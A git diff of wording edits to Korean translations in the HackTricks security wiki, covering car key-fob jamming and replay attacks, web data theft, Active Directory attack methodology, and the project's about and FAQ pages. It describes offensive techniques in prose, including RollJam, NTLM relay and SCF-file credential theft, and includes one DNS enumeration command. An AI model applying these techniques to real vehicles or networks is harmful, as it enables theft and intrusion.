diff --git a/src/todo/radio-hacking/sub-ghz-rf.md b/src/todo/radio-hacking/sub-ghz-rf.md
index 42b5d39a1..8f03ef406 100644
--- a/src/todo/radio-hacking/sub-ghz-rf.md
+++ b/src/todo/radio-hacking/sub-ghz-rf.md
@@ -8,26 +8,26 @@
 
 ## 자동차 문
 
-대부분의 자동차 키 폼은 **315 MHz 또는 433 MHz**에서 작동합니다. 이 두 주파수는 모두 라디오 주파수이며 다양한 응용 프로그램에 사용됩니다. 두 주파수의 주요 차이점은 433 MHz가 315 MHz보다 더 긴 범위를 가지고 있다는 것입니다. 이는 433 MHz가 원격 키리스 진입과 같이 더 긴 범위가 필요한 응용 프로그램에 더 적합하다는 것을 의미합니다.\
+대부분의 자동차 키 폼은 **315 MHz 또는 433 MHz**에서 작동합니다. 이 두 주파수는 모두 라디오 주파수이며 다양한 응용 프로그램에 사용됩니다. 두 주파수의 주요 차이점은 433 MHz가 315 MHz보다 더 긴 범위를 가진다는 것입니다. 이는 433 MHz가 원격 키리스 진입과 같이 더 긴 범위가 필요한 응용 프로그램에 더 적합하다는 것을 의미합니다.\
 유럽에서는 433.92MHz가 일반적으로 사용되며, 미국과 일본에서는 315MHz가 사용됩니다.
 
 ## **무차별 대입 공격**
 
 <figure><img src="../../images/image (1084).png" alt=""><figcaption></figcaption></figure>
 
-각 코드를 5번 전송하는 대신(수신자가 수신하도록 하기 위해 이렇게 전송됨) 한 번만 전송하면 시간이 6분으로 줄어듭니다:
+각 코드를 5번 보내는 대신(수신자가 수신하도록 하기 위해 이렇게 전송됨) 한 번만 보내면 시간이 6분으로 줄어듭니다:
 
 <figure><img src="../../images/image (622).png" alt=""><figcaption></figcaption></figure>
 
-신호 사이의 2ms 대기 시간을 **제거하면 시간을 3분으로 줄일 수 있습니다.**
+그리고 신호 사이의 **2ms 대기** 시간을 제거하면 **시간을 3분으로 줄일 수 있습니다.**
 
-또한, De Bruijn Sequence를 사용하면(모든 잠재적인 이진 숫자를 무차별 대입하기 위해 필요한 비트 수를 줄이는 방법) 이 **시간이 단 8초로 줄어듭니다**:
+더욱이, De Bruijn Sequence를 사용하면(모든 잠재적인 이진 숫자를 무차별 대입하기 위해 필요한 비트 수를 줄이는 방법) 이 **시간이 단 8초로 줄어듭니다**:
 
 <figure><img src="../../images/image (583).png" alt=""><figcaption></figcaption></figure>
 
 이 공격의 예는 [https://github.com/samyk/opensesame](https://github.com/samyk/opensesame)에서 구현되었습니다.
 
-**프리앰블을 요구하면 De Bruijn Sequence** 최적화를 피할 수 있으며, **롤링 코드는 이 공격을 방지합니다**(코드가 무차별 대입할 수 없을 만큼 충분히 길다고 가정할 때).
+**프리앰블이 필요하면 De Bruijn Sequence** 최적화를 피할 수 있으며, **롤링 코드는 이 공격을 방지합니다**(코드가 무차별 대입할 수 없을 만큼 충분히 길다고 가정할 때).
 
 ## Sub-GHz 공격
 
@@ -53,29 +53,29 @@ flipper-zero/fz-sub-ghz.md
 
 ### 전체 링크 재밍 공격
 
-공격자는 **차량이나 수신기 근처에서 신호를 방해**하여 **수신기가 실제로 코드를 ‘듣지 못하게** 할 수 있으며, 그렇게 되면 단순히 **코드를 캡처하고 재전송**할 수 있습니다.
+공격자는 **차량이나 수신기 근처에서 신호를 방해**하여 **수신기가 실제로 코드를 ‘듣지 못하게** 할 수 있습니다. 그런 다음 방해가 중단되면 **코드를 캡처하고 재전송**할 수 있습니다.
 
-피해자는 어느 시점에서 **차를 잠그기 위해 키를 사용할 것**이지만, 공격자는 **"문 닫기" 코드**를 충분히 기록했을 것이므로 이를 재전송하여 문을 열 수 있습니다(차량이 열고 닫는 데 동일한 코드를 사용하는 경우 **주파수 변경이 필요할 수 있습니다**).
+피해자는 어느 시점에서 **차를 잠그기 위해 키를 사용할 것**이지만, 공격자는 **"문 닫기" 코드**를 충분히 기록하여 문을 열 수 있기를 바랍니다(차량이 열고 닫기 위해 동일한 코드를 사용하지만 서로 다른 주파수에서 두 명령을 듣는 차량이 있을 수 있으므로 **주파수 변경이 필요할 수 있습니다**).
 
 > [!WARNING]
-> **재밍은 작동하지만**, 눈에 띄게 나타납니다. **차를 잠그는 사람이 문이 잠겼는지 확인하기 위해 단순히 테스트하면** 차가 잠기지 않았다는 것을 알게 될 것입니다. 또한, 그들이 이러한 공격을 알고 있다면 **문이 잠기는 소리**가 나지 않거나 **차량의 불빛**이 잠금 버튼을 눌렀을 때 깜박이지 않았다는 것을 들을 수 있습니다.
+> **재밍은 작동하지만**, 눈에 띄게 나타납니다. **차를 잠그는 사람이 문이 잠겼는지 확인하기 위해 단순히 테스트하면** 차가 잠기지 않은 것을 알 수 있습니다. 또한 이러한 공격을 인지하고 있다면, **문이 잠기는 소리**가 나지 않거나 **차량의 불빛**이 잠금 버튼을 눌렀을 때 깜박이지 않는 것을 들을 수 있습니다.
 
-### **코드 캡처 공격(일명 ‘롤잼’)**
+### **코드 그래빙 공격(일명 ‘롤잼’)**
 
-이는 보다 **은밀한 재밍 기술**입니다. 공격자는 신호를 방해하여 피해자가 문을 잠그려고 할 때 작동하지 않게 하지만, 공격자는 **이 코드를 기록**합니다. 그런 다음 피해자는 버튼을 눌러 **차를 다시 잠그려고 시도**하고 차량은 **이 두 번째 코드를 기록**합니다.\
-즉시 이후에 **공격자는 첫 번째 코드를 전송**하고 **차량이 잠깁니다**(피해자는 두 번째 눌림으로 잠겼다고 생각할 것입니다). 그런 다음 공격자는 **두 번째 도난 코드를 전송하여** 차량을 열 수 있습니다( **"차 닫기" 코드가 차량을 여는 데 사용될 수 있다고 가정할 때**). 주파수 변경이 필요할 수 있습니다(차량이 열고 닫는 데 동일한 코드를 사용하지만 서로 다른 주파수에서 두 명령을 듣는 경우).
+이것은 더 **은밀한 재밍 기술**입니다. 공격자는 신호를 방해하여 피해자가 문을 잠그려고 할 때 작동하지 않지만, 공격자는 **이 코드를 기록**합니다. 그런 다음 피해자는 버튼을 눌러 **차를 다시 잠그려고 시도하고 두 번째 코드를 기록**합니다.\
+즉시 후에 **공격자는 첫 번째 코드를 전송**하고 **차는 잠깁니다**(피해자는 두 번째 눌림으로 잠겼다고 생각할 것입니다). 그런 다음 공격자는 **두 번째 도난 코드를 전송하여** 차를 열 수 있습니다(가정하기에 **"차 닫기" 코드도 열기 위해 사용할 수 있습니다**). 주파수 변경이 필요할 수 있습니다(차량이 열고 닫기 위해 동일한 코드를 사용하지만 서로 다른 주파수에서 두 명령을 듣는 차량이 있을 수 있습니다).
 
-공격자는 **차량 수신기를 방해하고 자신의 수신기를 방해하지 않을 수 있습니다.** 예를 들어 차량 수신기가 1MHz 대역폭에서 듣고 있다면, 공격자는 리모컨이 사용하는 정확한 주파수를 **방해하지 않고** 그 스펙트럼에서 **가까운 주파수를 방해**하면서 **공격자의 수신기는 더 작은 범위에서** 리모컨 신호를 **방해 신호 없이 들을 수 있습니다.**
+공격자는 **차량 수신기를 방해하고 자신의 수신기는 방해하지 않을 수 있습니다.** 예를 들어 차량 수신기가 1MHz 대역폭에서 듣고 있다면, 공격자는 리모컨이 사용하는 정확한 주파수를 **방해하지 않고** 그 스펙트럼에서 **가까운 주파수를 방해**하면서 **공격자의 수신기는 더 작은 범위에서** 리모컨 신호를 **방해 신호 없이 들을 수 있습니다.**
 
 > [!WARNING]
-> 사양에서 본 다른 구현은 **롤링 코드가 전송된 총 코드의 일부**임을 보여줍니다. 즉, 전송된 코드는 **24비트 키**이며, 처음 **12비트는 롤링 코드**, **다음 8비트는 명령**(잠금 또는 잠금 해제와 같은)이고 마지막 4비트는 **체크섬**입니다. 이러한 유형을 구현하는 차량은 공격자가 롤링 코드 세그먼트를 교체하기만 하면 **두 주파수에서 모든 롤링 코드를 사용할 수 있게 됩니다.**
+> 사양에서 본 다른 구현은 **롤링 코드가 전송된 총 코드의 일부**임을 보여줍니다. 즉, 전송된 코드는 **24비트 키**이며, 첫 번째 **12비트는 롤링 코드**, **두 번째 8비트는 명령**(잠금 또는 잠금 해제와 같은)이고 마지막 4비트는 **체크섬**입니다. 이러한 유형을 구현하는 차량은 공격자가 롤링 코드 세그먼트를 교체하기만 하면 **두 주파수에서 모든 롤링 코드를 사용할 수 있게 됩니다.**
 
 > [!CAUTION]
 > 피해자가 공격자가 첫 번째 코드를 전송하는 동안 세 번째 코드를 전송하면 첫 번째 및 두 번째 코드는 무효화됩니다.
 
 ### 경고음 재밍 공격
 
-차량에 설치된 애프터마켓 롤링 코드 시스템에 대한 테스트에서, **같은 코드를 두 번 전송하면** 즉시 **알람**과 **이모빌라이저**가 활성화되어 독특한 **서비스 거부** 기회를 제공합니다. 아이러니하게도 **알람**과 **이모빌라이저를 비활성화하는 방법은 **리모컨을 누르는 것**이었으며, 이는 공격자가 **지속적으로 DoS 공격을 수행할 수 있는 능력을 제공합니다.** 또는 피해자가 공격을 최대한 빨리 중단하고 싶어하므로 **이 공격과 이전 공격을 혼합하여 더 많은 코드를 얻을 수 있습니다.**
+자동차에 설치된 애프터마켓 롤링 코드 시스템에 대한 테스트에서, **같은 코드를 두 번 전송하면** 즉시 **알람**과 **이모빌라이저**가 활성화되어 독특한 **서비스 거부** 기회를 제공합니다. 아이러니하게도 **알람**과 **이모빌라이저를 **비활성화하는 방법은 **리모컨을 누르는 것**이었으며, 이는 공격자가 **지속적으로 DoS 공격을 수행할 수 있는 능력을 제공합니다.** 또는 피해자가 공격을 최대한 빨리 중단하고 싶어하므로 **이 공격을 이전 공격과 혼합하여 더 많은 코드를 얻을 수 있습니다.**
 
 ## 참고 문헌
 
diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md
index 7bb23561f..e43b277dc 100644
--- a/src/todo/rust-basics.md
+++ b/src/todo/rust-basics.md
@@ -222,7 +222,7 @@ optional = Some(i + 1);
 ```
 ### 특성
 
-타입을 위한 새로운 메서드 생성
+타입에 대한 새로운 메서드 생성
 ```rust
 trait AppendBar {
 fn append_bar(self) -> Self;
diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
index 9ee8508cd..d4a224d8b 100644
--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -2,8 +2,8 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-어떤 시점에 **세션에 따라 민감한 정보를 제공하는 웹 페이지를 발견하면**: 쿠키를 반영하거나, CC 세부정보 또는 기타 민감한 정보를 출력하는 경우, 이를 도용하려고 시도할 수 있습니다.\
-여기에서 이를 달성하기 위해 시도할 수 있는 주요 방법을 소개합니다:
+어떤 시점에 **세션에 따라 민감한 정보를 제공하는 웹 페이지를 발견하면**: 쿠키를 반영하거나, 카드 세부정보를 인쇄하거나, 기타 민감한 정보를 표시할 수 있습니다. 이 정보를 도용하려고 시도할 수 있습니다.\
+여기서 이를 달성하기 위해 시도할 수 있는 주요 방법을 소개합니다:
 
 - [**CORS 우회**](../pentesting-web/cors-bypass.md): CORS 헤더를 우회할 수 있다면 악성 페이지에 대한 Ajax 요청을 수행하여 정보를 도용할 수 있습니다.
 - [**XSS**](../pentesting-web/xss-cross-site-scripting/): 페이지에서 XSS 취약점을 발견하면 이를 악용하여 정보를 도용할 수 있습니다.
diff --git a/src/welcome/about-the-author.md b/src/welcome/about-the-author.md
index e0da74799..879e5767c 100644
--- a/src/welcome/about-the-author.md
+++ b/src/welcome/about-the-author.md
@@ -4,9 +4,9 @@
 
 ### 안녕하세요!!
 
-우선, 다른 사이트의 연구에서 나온 기술에 대한 모든 **크레딧은 원저자에게 속한다는 점을 명시할 필요가 있습니다** (페이지에 참고 문헌이 있습니다). 인터넷 보안을 향상시키기 위해 지식을 공유하는 모든 연구에 감사드립니다.
+우선, 다른 사이트의 연구에서 나온 기술에 대한 모든 **크레딧은 원저자에게 속한다는 점을 명시할 필요가 있습니다** (페이지에 참고 문헌이 있습니다). 인터넷 보안을 향상시키기 위해 지식을 공유하는 모든 연구에 경의를 표합니다.
 
-HackTricks는 Carlos가 이끄는 **사이버 보안**에 대한 지식을 모은 교육용 위키로, 수백 명의 협력자가 있습니다! 이는 **해킹 기술의 방대한 모음**으로, 커뮤니티가 가능한 한 자주 업데이트하여 최신 상태를 유지합니다. 누락되거나 오래된 내용이 있으면, **Pull Request**를 [**Hacktricks Github**](https://github.com/carlospolop/hacktricks)로 보내주세요!
+HackTricks는 Carlos가 이끄는 **사이버 보안**에 대한 지식을 모은 교육용 위키로, 수백 명의 협력자가 있습니다! 이는 커뮤니티에 의해 가능한 한 최신 상태로 유지되는 **해킹 기술의 방대한 모음**입니다. 누락되거나 오래된 내용이 있으면, **Pull Request**를 [**Hacktricks Github**](https://github.com/carlospolop/hacktricks)로 보내주세요!
 
 HackTricks는 또한 **많은 연구자들이 최신 발견을 공유하는 위키**이므로, 최신 해킹 기술을 따라잡기에 좋은 장소입니다.
 
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 0a2e95b31..4919ca5de 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -7,15 +7,15 @@
 > [!TIP]
 > 이것은 **HackTricks 프로젝트의 가치**입니다:
 >
-> - **모든** 인터넷 사용자에게 **무료**로 **교육적인 해킹** 리소스를 제공합니다.
+> - **모든** 인터넷 사용자에게 **무료**로 **교육적 해킹** 리소스에 접근할 수 있도록 합니다.
 >   - 해킹은 배우는 것이며, 배우는 것은 가능한 한 무료여야 합니다.
 >   - 이 책의 목적은 포괄적인 **교육 리소스**로서의 역할을 하는 것입니다.
 > - 커뮤니티가 게시한 멋진 **해킹** 기술을 **저장**하고 **원래 저자**에게 모든 **크레딧**을 부여합니다.
 >   - **우리는 다른 사람에게서 크레딧을 원하지 않습니다**, 우리는 단지 모두를 위해 멋진 트릭을 저장하고 싶습니다.
 >   - 우리는 또한 HackTricks에서 **우리의 연구**를 작성합니다.
 >   - 여러 경우에 우리는 기술의 중요한 부분에 대한 **요약을 HackTricks에 작성하고** 더 많은 세부정보를 위해 **원래 게시물을 방문하도록 독자를 권장할 것입니다**.
-> - 책의 모든 해킹 기술을 **조직화**하여 **더 접근 가능하게** 만듭니다.
->   - HackTricks 팀은 사람들이 **더 빠르게 배울 수 있도록** 콘텐츠를 **조직화하는 데** 수천 시간을 무료로 헌신했습니다.
+> - 책의 모든 해킹 기술을 **조직화**하여 **더 쉽게 접근할 수 있도록** 합니다.
+>   - HackTricks 팀은 사람들이 **더 빠르게 배울 수 있도록** 콘텐츠를 **조직하는 데만** 수천 시간을 무료로 헌신했습니다.
 
 <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
 
@@ -25,9 +25,9 @@
 >
 > - **이 리소스에 대해 정말 감사합니다. 어떻게 감사할 수 있을까요?**
 
-HackTricks 팀이 모든 리소스를 공개적으로 모아준 것에 대해 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 언급하며 트윗으로 공개적으로 감사할 수 있습니다.\
+HackTricks 팀이 이러한 모든 리소스를 공개적으로 모아준 것에 대해 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 언급하며 트윗으로 공개적으로 감사할 수 있습니다.\
 특별히 감사한 마음이 있다면 [**여기에서 프로젝트를 후원할 수 있습니다**](https://github.com/sponsors/carlospolop).\
-그리고 **Github 프로젝트에 별을 주는 것을 잊지 마세요!** (아래 링크를 찾으세요).
+그리고 **Github 프로젝트에 별을 주는 것을 잊지 마세요!** (아래 링크를 확인하세요).
 
 > [!TIP]
 >
@@ -51,7 +51,7 @@ HackTricks 팀이 모든 리소스를 공개적으로 모아준 것에 대해 [*
 > - **HackTricks의 페이지를 어떻게 인용할 수 있나요?**
 
 정보를 가져온 페이지의 **링크**가 나타나기만 하면 충분합니다.\
-bibtex가 필요하다면 다음과 같은 것을 사용할 수 있습니다:
+Bibtex가 필요하다면 다음과 같은 형식을 사용할 수 있습니다:
 ```latex
 @misc{hacktricks-bibtexing,
 author = {"HackTricks Team" or the Authors name of the specific page/trick},
@@ -66,7 +66,7 @@ url = {\url{https://book.hacktricks.xyz/specific-page}},
 
 **그렇지 않기를 바랍니다**. 이는 **아무에게도 도움이 되지 않습니다**. 모든 **내용은 이미 공식 HackTricks 책에서 무료로 공개되어 있습니다**.
 
-사라질까 두려우시다면, 그냥 Github에서 포크하거나 다운로드하세요. 이미 무료입니다.
+사라질까 걱정된다면, 그냥 Github에서 포크하거나 다운로드하세요. 이미 무료입니다.
 
 > [!WARNING]
 >
@@ -74,17 +74,17 @@ url = {\url{https://book.hacktricks.xyz/specific-page}},
 
 첫 번째 **HackTricks** **가치**는 **모든** 사람에게 **무료** 해킹 교육 자료를 제공하는 것입니다. HackTricks 팀은 이 콘텐츠를 제공하기 위해 **수천 시간을 헌신했습니다**, 다시 말해 **무료**로 제공하고 있습니다.
 
-HackTricks 책이 **상업적 목적**을 위해 만들어졌다고 생각하신다면, **완전히 잘못된 생각입니다**.
+HackTricks 책이 **상업적 목적**을 위해 만들어졌다고 생각한다면, **완전히 잘못된 생각입니다**.
 
-우리는 후원자가 있습니다. 모든 콘텐츠가 무료이지만, 우리는 **커뮤니티가 우리의 작업을 감사할 수 있는 가능성을 제공하고 싶습니다**. 따라서, 우리는 사람들이 [**Github 후원자**](https://github.com/sponsors/carlospolop)를 통해 HackTricks에 기부할 수 있는 옵션과 **관련 사이버 보안 회사들**이 HackTricks를 후원하고 **책에 광고를 게재할 수 있는 옵션**을 제공합니다. 이 광고는 항상 **가시적**이지만 **학습** 과정에 방해가 되지 않는 곳에 배치됩니다.
+우리는 후원자가 있습니다. 모든 콘텐츠가 무료이지만, 우리는 **커뮤니티가 우리의 작업을 감사할 수 있는 가능성을 제공하고 싶습니다**. 따라서 사람들에게 [**Github 후원자**](https://github.com/sponsors/carlospolop)를 통해 HackTricks에 기부할 수 있는 옵션을 제공하고, **관련 사이버 보안 회사들**이 HackTricks를 후원하고 **책에 광고를 게재**할 수 있도록 하고 있습니다. 이 **광고**는 항상 **가시적**이지만 **학습** 과정에 방해가 되지 않는 곳에 배치됩니다.
 
-HackTricks는 HackTricks보다 훨씬 적은 콘텐츠를 가진 다른 블로그처럼 성가신 광고로 가득 차지 않을 것입니다. 왜냐하면 HackTricks는 상업적 목적을 위해 만들어지지 않았기 때문입니다.
+HackTricks는 HackTricks보다 훨씬 적은 콘텐츠를 가진 다른 블로그처럼 성가신 광고로 가득 차지 않을 것입니다. HackTricks는 상업적 목적을 위해 만들어지지 않았습니다.
 
 > [!CAUTION]
 >
 > - **내 블로그 게시물을 기반으로 한 HackTricks 페이지가 있지만 참조되지 않았다면 어떻게 해야 하나요?**
 
-**죄송합니다. 이런 일이 발생해서는 안 됩니다**. HackTricks 페이지의 링크와 귀하의 블로그 링크를 Github 이슈, Twitter, Discord 등을 통해 알려주시면 **확인하고 ASAP 추가하겠습니다**.
+**죄송합니다. 이런 일이 발생해서는 안 되었습니다**. HackTricks 페이지의 링크와 귀하의 블로그 링크를 Github 이슈, Twitter, Discord 등을 통해 알려주시면 **확인하고 ASAP 추가하겠습니다**.
 
 > [!CAUTION]
 >
@@ -93,7 +93,7 @@ HackTricks는 HackTricks보다 훨씬 적은 콘텐츠를 가진 다른 블로
 HackTricks에 귀하의 페이지 링크가 있는 것은:
 
 - 귀하의 **SEO**를 개선합니다.
-- 콘텐츠가 **15개 이상의 언어로 번역되어** 더 많은 사람들이 이 콘텐츠에 접근할 수 있게 됩니다.
+- 콘텐츠가 **15개 이상의 언어로 번역**되어 더 많은 사람들이 이 콘텐츠에 접근할 수 있게 됩니다.
 - **HackTricks는** 사람들이 **귀하의 페이지를 확인하도록 장려합니다** (여러 사람들이 HackTricks에 자신의 페이지가 포함된 이후로 더 많은 방문을 받았다고 언급했습니다).
 
 그러나 여전히 귀하의 블로그 콘텐츠가 HackTricks에서 제거되기를 원하신다면, 알려주시면 **귀하의 블로그에 대한 모든 링크**와 그에 기반한 콘텐츠를 **확실히 제거하겠습니다**.
@@ -106,7 +106,7 @@ HackTricks에 귀하의 페이지 링크가 있는 것은:
 
 ## LICENSE
 
-Copyright © 모든 권리 보유. 별도로 명시되지 않는 한.
+Copyright © 모든 권리 보유, 별도로 명시되지 않는 한.
 
 #### 라이센스 요약:
 
@@ -116,7 +116,7 @@ Copyright © 모든 권리 보유. 별도로 명시되지 않는 한.
 
 #### 추가 조건:
 
-- 제3자 콘텐츠: 이 블로그/책의 일부는 다른 블로그나 출판물의 발췌와 같은 다른 출처의 콘텐츠를 포함할 수 있습니다. 이러한 콘텐츠의 사용은 공정 사용의 원칙에 따라 이루어지거나 해당 저작권 소유자의 명시적인 허가를 받습니다. 제3자 콘텐츠에 대한 특정 라이센스 정보는 원본 출처를 참조하십시오.
+- 제3자 콘텐츠: 이 블로그/책의 일부는 다른 블로그나 출판물의 발췌와 같은 다른 출처의 콘텐츠를 포함할 수 있습니다. 이러한 콘텐츠의 사용은 공정 사용 원칙에 따라 이루어지거나 해당 저작권 소유자의 명시적 허가를 받습니다. 제3자 콘텐츠에 대한 특정 라이센스 정보는 원본 출처를 참조하십시오.
 - 저작권: HackTricks가 저작한 원본 콘텐츠는 이 라이센스의 조건에 따릅니다. 공유하거나 수정할 때 이 작업을 저자에게 귀속시키는 것이 권장됩니다.
 
 #### 면제:
@@ -130,11 +130,11 @@ Copyright © 모든 권리 보유. 별도로 명시되지 않는 한.
 ## **면책 조항**
 
 > [!CAUTION]
-> 이 책 'HackTricks'는 교육 및 정보 제공 목적으로만 사용됩니다. 이 책의 내용은 '있는 그대로' 제공되며, 저자와 출판사는 이 책에 포함된 정보, 제품, 서비스 또는 관련 그래픽의 완전성, 정확성, 신뢰성, 적합성 또는 가용성에 대해 명시적이거나 암시적인 어떤 종류의 진술이나 보증을 하지 않습니다. 따라서 귀하가 이러한 정보에 의존하는 것은 전적으로 귀하의 위험입니다.
+> 이 책 'HackTricks'는 교육 및 정보 제공 목적으로만 사용됩니다. 이 책의 내용은 '있는 그대로' 제공되며, 저자와 출판사는 이 책에 포함된 정보, 제품, 서비스 또는 관련 그래픽의 완전성, 정확성, 신뢰성, 적합성 또는 가용성에 대해 명시적이거나 묵시적인 어떤 종류의 진술이나 보증을 하지 않습니다. 따라서 귀하가 이러한 정보에 의존하는 것은 전적으로 귀하의 위험입니다.
 >
 > 저자와 출판사는 데이터 손실이나 이익 손실로 인해 발생하는 모든 손실이나 손해, 간접적 또는 결과적 손실이나 손해를 포함하여, 이 책의 사용과 관련하여 발생하는 모든 손실이나 손해에 대해 어떤 경우에도 책임을 지지 않습니다.
 >
-> 또한, 이 책에 설명된 기술과 팁은 교육 및 정보 제공 목적으로만 제공되며, 불법 또는 악의적인 활동에 사용되어서는 안 됩니다. 저자와 출판사는 불법 또는 비윤리적인 활동을 용인하거나 지지하지 않으며, 이 책에 포함된 정보를 사용하는 것은 사용자의 위험과 재량에 따라 이루어집니다.
+> 또한 이 책에 설명된 기술과 팁은 교육 및 정보 제공 목적으로만 제공되며, 불법 또는 악의적인 활동에 사용되어서는 안 됩니다. 저자와 출판사는 불법 또는 비윤리적인 활동을 용인하거나 지지하지 않으며, 이 책에 포함된 정보를 사용하는 것은 사용자의 위험과 재량에 따라 이루어집니다.
 >
 > 사용자는 이 책에 포함된 정보를 기반으로 취한 모든 행동에 대해 전적으로 책임이 있으며, 이 책에 설명된 기술이나 팁을 구현하려고 할 때 항상 전문가의 조언과 도움을 구해야 합니다.
 >
diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md
index 40c5876c6..ecdad5286 100644
--- a/src/windows-hardening/active-directory-methodology/README.md
+++ b/src/windows-hardening/active-directory-methodology/README.md
@@ -8,11 +8,11 @@
 
 **Active Directory**의 구조는 세 가지 주요 계층으로 구성됩니다: **도메인**, **트리**, 및 **포리스트**. **도메인**은 공통 데이터베이스를 공유하는 **사용자** 또는 **장치**와 같은 객체의 모음입니다. **트리**는 공유 구조로 연결된 이러한 도메인의 그룹이며, **포리스트**는 여러 트리의 모음을 나타내며, **신뢰 관계**를 통해 상호 연결되어 조직 구조의 최상위 계층을 형성합니다. 각 수준에서 특정 **접근** 및 **통신 권한**을 지정할 수 있습니다.
 
-**Active Directory**의 주요 개념은 다음과 같습니다:
+**Active Directory** 내의 주요 개념은 다음과 같습니다:
 
 1. **디렉토리** – Active Directory 객체와 관련된 모든 정보를 보관합니다.
 2. **객체** – 디렉토리 내의 엔티티를 나타내며, **사용자**, **그룹**, 또는 **공유 폴더**를 포함합니다.
-3. **도메인** – 디렉토리 객체의 컨테이너 역할을 하며, 여러 도메인이 **포리스트** 내에서 공존할 수 있으며, 각 도메인은 자체 객체 모음을 유지합니다.
+3. **도메인** – 디렉토리 객체의 컨테이너 역할을 하며, 여러 도메인이 **포리스트** 내에서 공존할 수 있도록 하며, 각 도메인은 자체 객체 모음을 유지합니다.
 4. **트리** – 공통 루트 도메인을 공유하는 도메인의 그룹입니다.
 5. **포리스트** – Active Directory의 조직 구조의 정점으로, 여러 트리로 구성되며 이들 간에 **신뢰 관계**가 있습니다.
 
@@ -41,7 +41,7 @@ AD를 **공격하는 방법**을 배우려면 **Kerberos 인증 프로세스**
 AD 환경에 접근할 수 있지만 자격 증명/세션이 없는 경우 다음을 수행할 수 있습니다:
 
 - **네트워크 펜테스트:**
-- 네트워크를 스캔하고, 머신과 열린 포트를 찾아 **취약점을 악용**하거나 **자격 증명**을 추출하려고 시도합니다 (예: [프린터는 매우 흥미로운 대상이 될 수 있습니다](ad-information-in-printers.md)).
+- 네트워크를 스캔하고, 머신과 열린 포트를 찾아 **취약점을 악용**하거나 **자격 증명을 추출**하려고 시도합니다 (예: [프린터는 매우 흥미로운 대상이 될 수 있습니다](ad-information-in-printers.md)).
 - DNS를 열거하면 도메인 내의 주요 서버에 대한 정보(웹, 프린터, 공유, VPN, 미디어 등)를 얻을 수 있습니다.
 - `gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt`
 - 이를 수행하는 방법에 대한 더 많은 정보는 일반 [**펜테스팅 방법론**](../../generic-methodologies-and-resources/pentesting-methodology.md)을 참조하세요.
@@ -69,7 +69,7 @@ AD 환경에 접근할 수 있지만 자격 증명/세션이 없는 경우 다
 - [**악성 UPnP 서비스 노출로 자격 증명 수집**](../../generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
 - [**OSINT**](https://book.hacktricks.xyz/external-recon-methodology):
 - 내부 문서, 소셜 미디어, 서비스(주로 웹)에서 사용자 이름/이름을 추출하고 공개적으로 이용 가능한 자료에서도 추출합니다.
-- 회사 직원의 전체 이름을 찾으면 다양한 AD **사용자 이름 규칙**을 시도해 볼 수 있습니다 (**[이것을 읽어보세요](https://activedirectorypro.com/active-directory-user-naming-convention/)**). 가장 일반적인 규칙은: _이름성_, _이름.성_, _이름성_ (각각 3글자), _이름.성_, _이.성_, _성.이름_, _성.이름_, _성N_, _성.N_, 3 _무작위 문자와 3 무작위 숫자_ (abc123)입니다.
+- 회사 직원의 전체 이름을 찾으면 다양한 AD **사용자 이름 규칙**을 시도해 볼 수 있습니다 (**[이것을 읽어보세요](https://activedirectorypro.com/active-directory-user-naming-convention/)**). 가장 일반적인 규칙은: _NameSurname_, _Name.Surname_, _NamSur_ (각각 3글자), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _무작위 문자와 3 무작위 숫자_ (abc123)입니다.
 - 도구:
 - [w0Tx/generate-ad-username](https://github.com/w0Tx/generate-ad-username)
 - [urbanadventurer/username-anarchy](https://github.com/urbanadventurer/username-anarchy)
@@ -121,7 +121,7 @@ password-spraying.md
 
 ### LLMNR/NBT-NS 중독
 
-네트워크의 일부 프로토콜을 **중독**하여 **해시**를 **획득**할 수 있습니다:
+네트워크의 일부 프로토콜을 **중독**하여 **해시**를 **획득**할 수 있을지도 모릅니다:
 
 {{#ref}}
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -129,11 +129,11 @@ password-spraying.md
 
 ### NTML 릴레이
 
-활성 디렉토리를 열거하는 데 성공했다면 **더 많은 이메일과 네트워크에 대한 더 나은 이해**를 갖게 될 것입니다. NTML [**릴레이 공격**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) \*\*\*\*을 강제로 수행하여 AD 환경에 접근할 수 있습니다.
+활성 디렉토리를 열거하는 데 성공했다면 **더 많은 이메일과 네트워크에 대한 더 나은 이해**를 갖게 될 것입니다. NTML [**릴레이 공격**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) \*\*\*\*을 강제로 수행하여 AD 환경에 접근할 수 있을지도 모릅니다.
 
-### NTLM 자격 증명 도용
+### NTLM 자격 증명 훔치기
 
-**null 또는 guest 사용자**로 다른 PC나 공유에 **접근**할 수 있다면, **파일을 배치**할 수 있습니다 (예: SCF 파일). 이 파일이 접근되면 **당신에 대한 NTML 인증을 트리거**하여 **NTLM 챌린지**를 도용할 수 있습니다:
+**null 또는 guest 사용자**로 다른 PC나 공유에 **접근**할 수 있다면, **파일을 배치**할 수 있습니다 (예: SCF 파일). 이 파일이 접근되면 **당신에 대한 NTML 인증을 트리거**하여 **NTLM 챌린지**를 훔칠 수 있습니다:
 
 {{#ref}}
